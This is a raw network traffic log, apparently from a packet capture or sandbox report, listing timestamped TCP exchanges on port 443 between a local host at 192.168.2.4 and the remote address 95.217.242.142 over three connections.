Apr 29, 2024 22:13:21.559925079 CEST	49766	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:21.559935093 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:21.559981108 CEST	49766	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:21.604850054 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:21.604866982 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:21.604973078 CEST	49766	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:21.604984045 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:21.605031967 CEST	49766	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:21.643569946 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:21.643588066 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:21.643663883 CEST	49766	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:21.643676043 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:21.643821955 CEST	49766	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:21.670423031 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:21.670439005 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:21.670612097 CEST	49766	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:21.670619011 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:21.670665979 CEST	49766	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:21.696897984 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:21.696914911 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:21.697005033 CEST	49766	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:21.697015047 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:21.697058916 CEST	49766	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:21.719321012 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:21.719340086 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:21.719413996 CEST	49766	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:21.719424963 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:21.719477892 CEST	49766	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:21.742103100 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:21.742124081 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:21.742187977 CEST	49766	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:21.742196083 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:21.742239952 CEST	49766	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:21.764974117 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:21.764991045 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:21.765049934 CEST	49766	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:21.765060902 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:21.765093088 CEST	49766	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:21.765115976 CEST	49766	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:21.785239935 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:21.785258055 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:21.785334110 CEST	49766	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:21.785341978 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:21.785397053 CEST	49766	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:21.802958012 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:21.802974939 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:21.803030968 CEST	49766	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:21.803040028 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:21.803078890 CEST	49766	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:21.803092003 CEST	49766	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:21.821248055 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:21.821263075 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:21.821333885 CEST	49766	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:21.821350098 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:21.821392059 CEST	49766	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:21.839931965 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:21.839952946 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:21.840023041 CEST	49766	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:21.840030909 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:21.840075016 CEST	49766	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:21.854067087 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:21.854083061 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:21.854166031 CEST	49766	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:21.854173899 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:21.854346037 CEST	49766	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:21.871493101 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:21.871509075 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:21.871596098 CEST	49766	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:21.871604919 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:21.871763945 CEST	49766	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:21.886162043 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:21.886182070 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:21.886249065 CEST	49766	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:21.886256933 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:21.886288881 CEST	49766	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:21.886305094 CEST	49766	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:21.901988029 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:21.902003050 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:21.902092934 CEST	49766	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:21.902100086 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:21.902133942 CEST	49766	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:21.902152061 CEST	49766	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:21.916393995 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:21.916409016 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:21.916486025 CEST	49766	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:21.916492939 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:21.916647911 CEST	49766	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:21.916647911 CEST	49766	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:21.929950953 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:21.929965973 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:21.930057049 CEST	49766	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:21.930064917 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:21.930223942 CEST	49766	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:21.943778038 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:21.943794012 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:21.943859100 CEST	49766	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:21.943867922 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:21.943921089 CEST	49766	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:21.955571890 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:21.955590963 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:21.955684900 CEST	49766	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:21.955697060 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:21.955857992 CEST	49766	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:21.967915058 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:21.967932940 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:21.968018055 CEST	49766	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:21.968033075 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:21.968082905 CEST	49766	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:21.978970051 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:21.978986025 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:21.979060888 CEST	49766	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:21.979069948 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:21.979229927 CEST	49766	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:21.991298914 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:21.991312981 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:21.991394043 CEST	49766	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:21.991400957 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:21.991583109 CEST	49766	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:22.001467943 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:22.001485109 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:22.001574993 CEST	49766	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:22.001583099 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:22.001636982 CEST	49766	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:22.012068033 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:22.012083054 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:22.012146950 CEST	49766	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:22.012155056 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:22.012197971 CEST	49766	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:22.021501064 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:22.021517038 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:22.021589041 CEST	49766	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:22.021598101 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:22.021641016 CEST	49766	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:22.032217026 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:22.032233953 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:22.032300949 CEST	49766	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:22.032310009 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:22.032469988 CEST	49766	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:22.041126966 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:22.041141033 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:22.041233063 CEST	49766	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:22.041243076 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:22.041290998 CEST	49766	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:22.050462961 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:22.050484896 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:22.050558090 CEST	49766	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:22.050566912 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:22.050607920 CEST	49766	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:22.051779985 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:22.051839113 CEST	49766	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:22.051846027 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:22.051868916 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:22.051891088 CEST	49766	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:22.051906109 CEST	49766	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:22.051913023 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:22.051923990 CEST	49766	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:22.051943064 CEST	49766	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:22.097044945 CEST	49767	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:22.097069979 CEST	443	49767	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:22.097134113 CEST	49767	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:22.097460032 CEST	49767	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:22.097470045 CEST	443	49767	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:22.553082943 CEST	443	49767	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:22.553261042 CEST	49767	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:22.553644896 CEST	49767	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:22.553654909 CEST	443	49767	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:22.553812027 CEST	49767	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:22.553817034 CEST	443	49767	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:23.273855925 CEST	443	49767	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:23.273881912 CEST	443	49767	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:23.273895979 CEST	443	49767	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:23.273936033 CEST	49767	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:23.273966074 CEST	49767	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:23.273977995 CEST	443	49767	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:23.274029016 CEST	49767	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:23.376893044 CEST	443	49767	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:23.376919985 CEST	443	49767	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:23.377037048 CEST	49767	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:23.377051115 CEST	443	49767	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:23.377207994 CEST	49767	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:23.523821115 CEST	443	49767	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:23.523840904 CEST	443	49767	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:23.524023056 CEST	49767	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:23.524036884 CEST	443	49767	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:23.524080992 CEST	49767	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:23.623387098 CEST	443	49767	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:23.623405933 CEST	443	49767	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:23.623505116 CEST	49767	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:23.623516083 CEST	443	49767	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:23.623565912 CEST	49767	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:23.700942993 CEST	443	49767	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:23.700961113 CEST	443	49767	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:23.701046944 CEST	49767	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:23.701056004 CEST	443	49767	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:23.701220989 CEST	49767	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:23.756603003 CEST	443	49767	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:23.756649017 CEST	443	49767	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:23.756722927 CEST	49767	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:23.756732941 CEST	443	49767	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:23.756777048 CEST	49767	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:23.802046061 CEST	443	49767	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:23.802062988 CEST	443	49767	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:23.802114964 CEST	49767	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:23.802124977 CEST	443	49767	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:23.802150011 CEST	49767	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:23.802170038 CEST	49767	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:23.843333960 CEST	443	49767	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:23.843352079 CEST	443	49767	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:23.843413115 CEST	49767	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:23.843425989 CEST	443	49767	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:23.843482971 CEST	49767	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:23.886255026 CEST	443	49767	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:23.886275053 CEST	443	49767	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:23.886406898 CEST	49767	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:23.886429071 CEST	443	49767	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:23.886482000 CEST	49767	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:23.929605007 CEST	443	49767	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:23.929622889 CEST	443	49767	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:23.929846048 CEST	49767	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:23.929862976 CEST	443	49767	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:23.929924011 CEST	49767	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:23.966844082 CEST	443	49767	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:23.966860056 CEST	443	49767	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:23.967042923 CEST	49767	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:23.967056990 CEST	443	49767	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:23.967113972 CEST	49767	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:23.993051052 CEST	443	49767	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:23.993067026 CEST	443	49767	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:23.993271112 CEST	49767	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:23.993271112 CEST	49767	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:23.993288994 CEST	443	49767	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:23.993338108 CEST	49767	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:24.018898964 CEST	443	49767	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:24.018918991 CEST	443	49767	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:24.018979073 CEST	49767	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:24.018987894 CEST	443	49767	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:24.019027948 CEST	49767	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:24.040802002 CEST	443	49767	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:24.040821075 CEST	443	49767	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:24.040894032 CEST	49767	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:24.040905952 CEST	443	49767	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:24.040950060 CEST	49767	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:24.063952923 CEST	443	49767	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:24.063971043 CEST	443	49767	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:24.064039946 CEST	49767	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:24.064050913 CEST	443	49767	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:24.064091921 CEST	49767	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:24.082842112 CEST	443	49767	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:24.082860947 CEST	443	49767	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:24.083024025 CEST	49767	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:24.083024025 CEST	49767	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:24.083033085 CEST	443	49767	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:24.083077908 CEST	49767	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:24.103849888 CEST	443	49767	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:24.103868008 CEST	443	49767	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:24.103935957 CEST	49767	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:24.103944063 CEST	443	49767	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:24.103991985 CEST	49767	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:24.120785952 CEST	443	49767	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:24.120801926 CEST	443	49767	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:24.120856047 CEST	49767	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:24.120862961 CEST	443	49767	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:24.120904922 CEST	49767	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:24.139316082 CEST	443	49767	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:24.139333010 CEST	443	49767	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:24.139386892 CEST	49767	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:24.139406919 CEST	443	49767	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:24.139420033 CEST	49767	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:24.139446020 CEST	49767	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:24.155016899 CEST	443	49767	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:24.155033112 CEST	443	49767	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:24.155184984 CEST	49767	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:24.155184984 CEST	49767	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:24.155193090 CEST	443	49767	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:24.155230999 CEST	49767	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:24.170006990 CEST	443	49767	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:24.170022964 CEST	443	49767	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:24.170093060 CEST	49767	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:24.170104027 CEST	443	49767	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:24.170146942 CEST	49767	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:24.186821938 CEST	443	49767	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:24.186840057 CEST	443	49767	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:24.186899900 CEST	49767	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:24.186908960 CEST	443	49767	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:24.186923981 CEST	49767	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:24.186953068 CEST	49767	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:24.202008009 CEST	443	49767	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:24.202023983 CEST	443	49767	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:24.202091932 CEST	49767	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:24.202100992 CEST	443	49767	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:24.202115059 CEST	49767	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:24.202141047 CEST	49767	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:24.215214968 CEST	443	49767	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:24.215231895 CEST	443	49767	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:24.215305090 CEST	49767	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:24.215312004 CEST	443	49767	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:24.215353966 CEST	49767	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:24.230101109 CEST	443	49767	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:24.230115891 CEST	443	49767	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:24.230181932 CEST	49767	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:24.230195999 CEST	443	49767	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:24.230351925 CEST	49767	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:24.242527962 CEST	443	49767	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:24.242543936 CEST	443	49767	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:24.242623091 CEST	49767	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:24.242631912 CEST	443	49767	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:24.242674112 CEST	49767	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:24.255364895 CEST	443	49767	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:24.255382061 CEST	443	49767	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:24.255425930 CEST	49767	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:24.255431890 CEST	443	49767	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:24.255465984 CEST	49767	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:24.255475044 CEST	49767	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:24.261157990 CEST	443	49767	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:24.261226892 CEST	49767	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:24.261234045 CEST	443	49767	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:24.261277914 CEST	49767	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:24.486604929 CEST	49767	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:24.486634016 CEST	443	49767	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:25.145106077 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:25.145148039 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:25.145205975 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:25.145525932 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:25.145539999 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:25.602655888 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:25.602802038 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:25.656033039 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:25.656043053 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:25.656187057 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:25.656191111 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:26.327224970 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:26.327253103 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:26.327270985 CEST	443	49768	95.217.242.142	192.168.2.4
